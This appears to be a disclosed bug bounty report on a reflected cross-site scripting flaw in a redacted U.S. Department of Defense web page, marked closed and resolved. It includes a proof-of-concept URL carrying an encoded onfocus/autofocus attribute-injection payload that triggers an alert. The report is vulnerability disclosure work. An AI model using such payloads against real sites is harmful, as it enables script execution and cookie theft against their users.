Reflected XSS at https://██████████/████████ via "███████" parameter
Medium
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
pelegn
Vulnerability Details
Technical details and impact analysis
There is Reflected Cross site scripting issue at the following url:
https://████████/█████
Proof Of Concept
https://████/███?███=%22onfocus%3d%22alert(document.domain)%22autofocus%3d%22&submit=Search
███
Best Regards
@pelegn
## Impact
Cookies Exfiltration
SOAP Bypass
CORS Bypass
Executing javascript on the victim behalf
## System Host(s)
██████████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Navigate to https://███████/████████?███████=%22onfocus%3d%22alert(document.domain)%22autofocus%3d%22&submit=Search
## Suggested Mitigation/Remediation Actions
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected